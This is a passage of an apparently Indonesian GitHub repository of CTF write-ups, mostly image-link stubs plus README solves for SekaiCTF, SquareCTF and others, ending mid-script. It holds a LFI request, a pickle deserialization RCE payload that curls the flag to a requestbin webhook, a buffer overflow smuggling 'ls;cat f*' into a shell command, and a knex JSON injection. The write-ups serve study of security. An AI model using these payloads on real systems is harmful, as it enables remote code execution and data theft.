print(chr(64+i).lower(),end="") 145 | print('}') 146 | ``` 147 | 148 | 149 | # stegano 150 | ## The Goodest Boy 151 | diberikan gambar ANJING! wkwkw dalam jika dilihat string ada ascci bertuliskan password:borkbork 152 | 153 | coba extract pake tool steghide ternyta ada pdf yang berisi flag 154 | flag{whos_A_g00d_boi_bork_bork} 155 | 156 | # SQL 157 | ## Counting heads 158 | diberikan file .sql, import sqlnya, terus masuk ke database nya, masukin query flag{2400} 159 | 160 |  161 | 162 | ## The Faculty 163 | lanjutan sql sebelumnya, masukin query 164 | 165 | select count(r.user_id) from roles_assigned r join users u on r.user_id=u.user_id where not role_id=1; 166 | 167 | flag{627} 168 | 169 |  170 | 171 | ## Let's Hash It Out 172 | diberi clue DEADFACE menargetkan sebuah user, lihat password user tersebut. 173 | 174 | langsung cari di https://ghosttown.deadface.io/ ketemu post Database Question lanjut cari siapa user yang dimaksud, ternyata role Administration, selanjutnya kita query role Administration pada bagian passwordnya 175 | 176 | flag{b487af41779cffb9572b982e1a0bf83f0eafbe05} 177 | 178 |  179 | 180 |  181 | 182 | ## Fall Classes 183 | diberikan pertanyaan berapa banyak kelas musim semi yang unik. 184 | langsung bikin query select count(distinct tc.course_id) from terms t join term_courses tc on t.term_id=tc.term_id where t.term_id=2; 185 | flag{405} 186 | 187 |  188 | 189 | # Bonus 190 | 191 | ## Contact 192 | 193 | Dalam ssh di user crypto\_vamp kita inputkan man reader untuk melihat manual dari program yang dibuat lilith 194 | 195 | ``` 196 | crypto_vamp@3e71a870077f:/home/spookyboi$ man reader 197 | man(8) reader man page man(8) 198 | 199 | NAME 200 | reader - read files as lilith 201 | 202 | SYNOPSIS 203 | reader [OPTIONS] [FILENAME] 204 | 205 | DESCRIPTION 206 | reader is developed to help crypto_vamp and other new recruits read privileged files until their vetting process is complete. 207 | 208 | OPTIONS 209 | -f, --file FILENAME 210 | Read the contents of FILENAME. 211 | 212 | -c, --command COMMAND 213 | Execute a command (for troubleshooting purposes ONLY). 214 | 215 | -h, --help 216 | View the help information. 217 | 218 | -v, --version 219 | View the version information. 220 | 221 | BUGS No known bugs. 222 | 223 | AUTHOR 224 | Lilith (bl0ody_mary@deadface.io) 225 | 226 | 1.3.1 227 | ``` 228 | 229 | maka disitu akan ada emailnya si lilith -------------------------------------------------------------------------------- /2022/gdg-algiers-ctf/Pasted image 20221010110356.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/gdg-algiers-ctf/Pasted image 20221010110356.png -------------------------------------------------------------------------------- /2022/gdg-algiers-ctf/Pasted image 20221010110402.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/gdg-algiers-ctf/Pasted image 20221010110402.png -------------------------------------------------------------------------------- /2022/gdg-algiers-ctf/Pasted image 20221010110408.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/gdg-algiers-ctf/Pasted image 20221010110408.png -------------------------------------------------------------------------------- /2022/gdg-algiers-ctf/Pasted image 20221010110505.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/gdg-algiers-ctf/Pasted image 20221010110505.png -------------------------------------------------------------------------------- /2022/gdg-algiers-ctf/Pasted image 20221010110510.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/gdg-algiers-ctf/Pasted image 20221010110510.png -------------------------------------------------------------------------------- /2022/gdg-algiers-ctf/Pasted image 20221010110604.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/gdg-algiers-ctf/Pasted image 20221010110604.png -------------------------------------------------------------------------------- /2022/gdg-algiers-ctf/Pasted image 20221010110608.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/gdg-algiers-ctf/Pasted image 20221010110608.png -------------------------------------------------------------------------------- /2022/gdg-algiers-ctf/Pasted image 20221010110728.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/gdg-algiers-ctf/Pasted image 20221010110728.png -------------------------------------------------------------------------------- /2022/gdg-algiers-ctf/Pasted image 20221010111105.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/gdg-algiers-ctf/Pasted image 20221010111105.png -------------------------------------------------------------------------------- /2022/glacierctf-2022/Pasted image 20221127092045.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/glacierctf-2022/Pasted image 20221127092045.png -------------------------------------------------------------------------------- /2022/glacierctf-2022/Pasted image 20221127092101.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/glacierctf-2022/Pasted image 20221127092101.png -------------------------------------------------------------------------------- /2022/glacierctf-2022/Pasted image 20221127092221.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/glacierctf-2022/Pasted image 20221127092221.png -------------------------------------------------------------------------------- /2022/glacierctf-2022/Pasted image 20221127092240.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/glacierctf-2022/Pasted image 20221127092240.png -------------------------------------------------------------------------------- /2022/glacierctf-2022/Pasted image 20221127092353.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/glacierctf-2022/Pasted image 20221127092353.png -------------------------------------------------------------------------------- /2022/glacierctf-2022/Pasted image 20221127093038.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/glacierctf-2022/Pasted image 20221127093038.png -------------------------------------------------------------------------------- /2022/glacierctf-2022/Pasted image 20221127093304.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/glacierctf-2022/Pasted image 20221127093304.png -------------------------------------------------------------------------------- /2022/glacierctf-2022/Pasted image 20221127093345.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/glacierctf-2022/Pasted image 20221127093345.png -------------------------------------------------------------------------------- /2022/jade-ctf/Pasted image 20221023144928.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/jade-ctf/Pasted image 20221023144928.png -------------------------------------------------------------------------------- /2022/jade-ctf/Pasted image 20221023145014.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/jade-ctf/Pasted image 20221023145014.png -------------------------------------------------------------------------------- /2022/jade-ctf/Pasted image 20221023145032.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/jade-ctf/Pasted image 20221023145032.png -------------------------------------------------------------------------------- /2022/jade-ctf/Pasted image 20221023145105.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/jade-ctf/Pasted image 20221023145105.png -------------------------------------------------------------------------------- /2022/jade-ctf/Pasted image 20221023153937.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/jade-ctf/Pasted image 20221023153937.png -------------------------------------------------------------------------------- /2022/jade-ctf/Pasted image 20221023154016.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/jade-ctf/Pasted image 20221023154016.png -------------------------------------------------------------------------------- /2022/jade-ctf/Pasted image 20221023154059.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/jade-ctf/Pasted image 20221023154059.png -------------------------------------------------------------------------------- /2022/jade-ctf/Pasted image 20221023154120.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/jade-ctf/Pasted image 20221023154120.png -------------------------------------------------------------------------------- /2022/jade-ctf/Pasted image 20221023154451.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/jade-ctf/Pasted image 20221023154451.png -------------------------------------------------------------------------------- /2022/jade-ctf/Pasted image 20221023154508.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/jade-ctf/Pasted image 20221023154508.png -------------------------------------------------------------------------------- /2022/jade-ctf/Pasted image 20221023154544.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/jade-ctf/Pasted image 20221023154544.png -------------------------------------------------------------------------------- /2022/jade-ctf/Pasted image 20221023154728.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/jade-ctf/Pasted image 20221023154728.png -------------------------------------------------------------------------------- /2022/jade-ctf/Pasted image 20221023154928.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/jade-ctf/Pasted image 20221023154928.png -------------------------------------------------------------------------------- /2022/jade-ctf/Pasted image 20221023154942.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/jade-ctf/Pasted image 20221023154942.png -------------------------------------------------------------------------------- /2022/jade-ctf/Pasted image 20221023155120.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/jade-ctf/Pasted image 20221023155120.png -------------------------------------------------------------------------------- /2022/jade-ctf/Pasted image 20221023155211.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/jade-ctf/Pasted image 20221023155211.png -------------------------------------------------------------------------------- /2022/jade-ctf/Pasted image 20221023155218.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/jade-ctf/Pasted image 20221023155218.png -------------------------------------------------------------------------------- /2022/kitctfctf-2022/Pasted image 20221211192759.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/kitctfctf-2022/Pasted image 20221211192759.png -------------------------------------------------------------------------------- /2022/kitctfctf-2022/Pasted image 20221211192912.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/kitctfctf-2022/Pasted image 20221211192912.png -------------------------------------------------------------------------------- /2022/kitctfctf-2022/Pasted image 20221211192926.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/kitctfctf-2022/Pasted image 20221211192926.png -------------------------------------------------------------------------------- /2022/kitctfctf-2022/Pasted image 20221211192941.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/kitctfctf-2022/Pasted image 20221211192941.png -------------------------------------------------------------------------------- /2022/kitctfctf-2022/Pasted image 20221211192953.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/kitctfctf-2022/Pasted image 20221211192953.png -------------------------------------------------------------------------------- /2022/kitctfctf-2022/Pasted image 20221211193146.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/kitctfctf-2022/Pasted image 20221211193146.png -------------------------------------------------------------------------------- /2022/kitctfctf-2022/Pasted image 20221211193234.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/kitctfctf-2022/Pasted image 20221211193234.png -------------------------------------------------------------------------------- /2022/sekai-ctf/Pasted image 20221004173301.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/sekai-ctf/Pasted image 20221004173301.png -------------------------------------------------------------------------------- /2022/sekai-ctf/Pasted image 20221004173340.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/sekai-ctf/Pasted image 20221004173340.png -------------------------------------------------------------------------------- /2022/sekai-ctf/README.md: -------------------------------------------------------------------------------- 1 | # Bottle Poem 2 | vulnerability: LFI plus python bottle library with pickle deserialization RCE 3 | 4 | Pertama kita perlu mengetahui letak dari program-nya 5 | 6 | ```http 7 | GET /show?id=/proc/thread-self/cmdline HTTP/1.1 8 | ``` 9 | 10 | setelah itu saya coba untuk meng-lfi semua file yang ada disana, antaralain 11 | 12 | - ./config/secret.py: disini saya menemukan key untuk encode cookie "name" 13 | - ./app.py: ini merupakan aplikasi utama-nya 14 | - ./views/\ 15 | 16 | Saya mencoba untuk mereplikasi program tersebut menggunakan file-file yang sudah saya temukan tadi, dan menjalankannya di localhost. 17 | Setelah sekian lama melihat source code dari app.py, disini saya curiga, bahwa vulnerabilitynya bukan berada di app.py tersebut, namun berada di library bottle. 18 | 19 | Saat melihat source code bottle.py kita bisa melihat fungsi 20 | ```python 21 | def get_cookie(self, key, default=None, secret=None): 22 | """ Return the content of a cookie. To read a `Signed Cookie`, the 23 | `secret` must match the one used to create the cookie (see 24 | :meth:`BaseResponse.set_cookie`). If anything goes wrong (missing 25 | cookie or wrong signature), return a default value. """ 26 | value = self.cookies.get(key) 27 | if secret and value: 28 | dec = cookie_decode(value, secret) # (key, value) tuple or None 29 | return dec[1] if dec and dec[0] == key else default 30 | return value or default 31 | ``` 32 | dan 33 | ```python 34 | def cookie_decode(data, key): 35 | ''' Verify and decode an encoded string. Return an object or None.''' 36 | data = tob(data) 37 | if cookie_is_encoded(data): 38 | sig, msg = data.split(tob('?'), 1) 39 | if _lscmp(sig[1:], base64.b64encode(hmac.new(tob(key), msg, digestmod=hashlib.md5).digest())): 40 | return pickle.loads(base64.b64decode(msg)) 41 | return None 42 | ``` 43 | 44 | mata saya langsung tertuju di library pickle yang merupakan module serialization dan deserialization di python. saya coba cari di google dan mendapatkan ini: [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/ "https://davidhamann.de/2020/04/05/exploiting-python-pickle/") 45 | 46 | ## exploitasi 47 | saya sedikit mengubah source code dari app.py dengan menyelipkan payload pickle rce 48 | 49 | ```python 50 | ...snip.. 51 | @route("/sign") 52 | def index(): 53 | try: 54 | COMMAND = """curl -X POST -d "fizz=`/flag`" https://requestbin.io/19b9tzf1""" 55 | class PickleRce(object): 56 | def __reduce__(self): 57 | import os 58 | return (os.system,(COMMAND,)) 59 | session = request.get_cookie("name", secret=sekai) 60 | if not session or session["name"] == "guest": 61 | session = {"name": PickleRce()} 62 | response.set_cookie("name", session, secret=sekai) 63 | return template("guest", name=session["name"]) 64 | if session["name"] == "admin": 65 | return template("admin", name=session["name"]) 66 | except: 67 | return "pls no hax" 68 | ...snip... 69 | ``` 70 | 71 | jalankan di localhost, masuk ke "localhost:\ /sign" lalu copy paste 72 | 73 |  74 | 75 | masukkan ke cookie tersebut di "http://bottle-poem.ctf.sekai.team/sign" 76 | 77 | dan boom, kita mendapatkan flagnya dari webhook kita 78 | 79 |  -------------------------------------------------------------------------------- /2022/square-ctf-2022/Pasted image 20221121074934.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/square-ctf-2022/Pasted image 20221121074934.png -------------------------------------------------------------------------------- /2022/square-ctf-2022/Pasted image 20221121074939.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/square-ctf-2022/Pasted image 20221121074939.png -------------------------------------------------------------------------------- /2022/square-ctf-2022/Pasted image 20221121075018.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/square-ctf-2022/Pasted image 20221121075018.png -------------------------------------------------------------------------------- /2022/square-ctf-2022/Pasted image 20221121075102.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/square-ctf-2022/Pasted image 20221121075102.png -------------------------------------------------------------------------------- /2022/square-ctf-2022/README.md: -------------------------------------------------------------------------------- 1 | # pwn 2 | ## ez-pwn-1 3 | ### tldr; 4 | dikasih source code 5 | ```c 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | 12 | int main() 13 | { 14 | char command[16]; 15 | char way_too_small_input_buf[8]; 16 | strcpy(command, "ls"); 17 | 18 | puts("Hi! would you like me to ls the current directory?"); 19 | read(0, way_too_small_input_buf, 24); 20 | if (!strcmp(way_too_small_input_buf, "no\n")) { 21 | puts("Oh, ok :("); 22 | exit(0); 23 | } 24 | 25 | puts("Ok, here ya go!\n"); 26 | system(command); 27 | 28 | } 29 | ``` 30 | 31 | tinggal bof biasa payload: aaaabaaacd th*;ls;cat f* 32 | 33 | flag: flag{congrats_youve_exploited_a_memory_corruption_vulnerability} 34 | 35 | # web 36 | ## xark 37 | Pada challenge in kita diberikan source code berupa js program. 38 | ```js 39 | ...snip... 40 | const app = express(); 41 | const port = 3001; 42 | const knex = require('knex')(config.get('knex')); 43 | ...snip... 44 | ``` 45 | 46 | program ini menggunakan knex sebagai module untuk mengurus query mysql program ini. 47 | https://github.com/knex/knex/issues/1227 48 | 49 |  50 | 51 | TL;DR knex mempunyai sebuah vulnerability lama, dimana kita bisa merubah query dari program knex menggunakan application/json post requests. Jadi semisal kita membuat query seperti dibawah ini: 52 | 53 | ```json 54 | {"to": {"message":"the flag is here!"}} 55 | ``` 56 | 57 | maka akan menjadi 58 | 59 |  60 | 61 | #### exploitation 62 | Jadi untuk mendapatkan flag yang terdapat di query di bawah ini: 63 | 64 | ```js 65 | ...snip... 66 | knex('crushes').insert({ 67 | from: config.init.flag, 68 | to: config.init.flag, 69 | message: 'This is the flag!', 70 | }).then(); 71 | } 72 | }); 73 | ...snip... 74 | ``` 75 | 76 | kita bisa melakukan post request application/json di endpoint POST /data HTTP/1.1 77 | 78 |  79 | 80 | -------------------------------------------------------------------------------- /2022/tangerang CTF/Pasted image 20220319104150.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/tangerang CTF/Pasted image 20220319104150.png -------------------------------------------------------------------------------- /2022/tangerang CTF/Pasted image 20220319174935.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/tangerang CTF/Pasted image 20220319174935.png -------------------------------------------------------------------------------- /2022/tangerang CTF/Pasted image 20220319174951.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/tangerang CTF/Pasted image 20220319174951.png -------------------------------------------------------------------------------- /2022/tangerang CTF/Pasted image 20220319180942.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/tangerang CTF/Pasted image 20220319180942.png -------------------------------------------------------------------------------- /2022/tangerang CTF/Pasted image 20220319194044.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/tangerang CTF/Pasted image 20220319194044.png -------------------------------------------------------------------------------- /2022/tangerang CTF/Pasted image 20220319194544.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/tangerang CTF/Pasted image 20220319194544.png -------------------------------------------------------------------------------- /2022/tangerang CTF/Pasted image 20220320063212.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/tangerang CTF/Pasted image 20220320063212.png -------------------------------------------------------------------------------- /2022/tangerang CTF/Pasted image 20220320065410.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/tangerang CTF/Pasted image 20220320065410.png -------------------------------------------------------------------------------- /2022/tangerang CTF/Pasted image 20220320102408.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/tangerang CTF/Pasted image 20220320102408.png -------------------------------------------------------------------------------- /2022/tangerang CTF/Pasted image 20220320103533.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/tangerang CTF/Pasted image 20220320103533.png -------------------------------------------------------------------------------- /2022/x-mas-ctf-2022/Pasted image 20221222205054.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/x-mas-ctf-2022/Pasted image 20221222205054.png -------------------------------------------------------------------------------- /2022/x-mas-ctf-2022/Pasted image 20221222205402.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/x-mas-ctf-2022/Pasted image 20221222205402.png -------------------------------------------------------------------------------- /2022/x-mas-ctf-2022/Pasted image 20221222205507.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/x-mas-ctf-2022/Pasted image 20221222205507.png -------------------------------------------------------------------------------- /2022/x-mas-ctf-2022/Pasted image 20221222205718.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/x-mas-ctf-2022/Pasted image 20221222205718.png -------------------------------------------------------------------------------- /2022/x-mas-ctf-2022/Pasted image 20221222205819.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/x-mas-ctf-2022/Pasted image 20221222205819.png -------------------------------------------------------------------------------- /2022/x-mas-ctf-2022/Pasted image 20221222205926.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/x-mas-ctf-2022/Pasted image 20221222205926.png -------------------------------------------------------------------------------- /2022/x-mas-ctf-2022/Pasted image 20221222210046.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/x-mas-ctf-2022/Pasted image 20221222210046.png -------------------------------------------------------------------------------- /2022/x-mas-ctf-2022/Pasted image 20221222210140.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/x-mas-ctf-2022/Pasted image 20221222210140.png -------------------------------------------------------------------------------- /2022/x-mas-ctf-2022/Pasted image 20221222210201.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/x-mas-ctf-2022/Pasted image 20221222210201.png -------------------------------------------------------------------------------- /2022/x-mas-ctf-2022/Pasted image 20221222210316.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/x-mas-ctf-2022/Pasted image 20221222210316.png -------------------------------------------------------------------------------- /2022/x-mas-ctf-2022/Pasted image 20221222210324.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/x-mas-ctf-2022/Pasted image 20221222210324.png -------------------------------------------------------------------------------- /2022/x-mas-ctf-2022/Pasted image 20221223211635.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/x-mas-ctf-2022/Pasted image 20221223211635.png -------------------------------------------------------------------------------- /2022/x-mas-ctf-2022/Pasted image 20221223211710.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/x-mas-ctf-2022/Pasted image 20221223211710.png -------------------------------------------------------------------------------- /2022/x-mas-ctf-2022/Pasted image 20221223211742.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/x-mas-ctf-2022/Pasted image 20221223211742.png -------------------------------------------------------------------------------- /2022/x-mas-ctf-2022/Pasted image 20221223211801.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/x-mas-ctf-2022/Pasted image 20221223211801.png -------------------------------------------------------------------------------- /2022/x-mas-ctf-2022/Pasted image 20221223212147.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/x-mas-ctf-2022/Pasted image 20221223212147.png -------------------------------------------------------------------------------- /2022/x-mas-ctf-2022/Pasted image 20221223212155.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/x-mas-ctf-2022/Pasted image 20221223212155.png -------------------------------------------------------------------------------- /2023/ByuCtf-2023/README.md: -------------------------------------------------------------------------------- 1 | --- 2 | archive: https://drive.google.com/drive/folders/12dwK2ehCbXgppxWXFanpri4Msy4N177Y?usp=share_link 3 | official_writeup: https://github.com/BYU-CSA/BYUCTF-2023/tree/main 4 | --- 5 | 6 | # chain 7 | 8 | ```python 9 | from pwn import * 10 | 11 | key = p64(0xe59f1024e59f0024).hex() 12 | key += p64(0xe1a01fa3e0413000).hex() 13 | key += p64(0xe1b010c1e0811143).hex() 14 | key += p64(0xe59f3010012fff1e).hex() 15 | key += p64(0x012fff1ee3530000).hex() 16 | key += p64(0x000210f8e12fff13).hex() 17 | 18 | key_list = [int(key[i:i+2],16) for i in range(0, len(key), 2)] 19 | 20 | array = 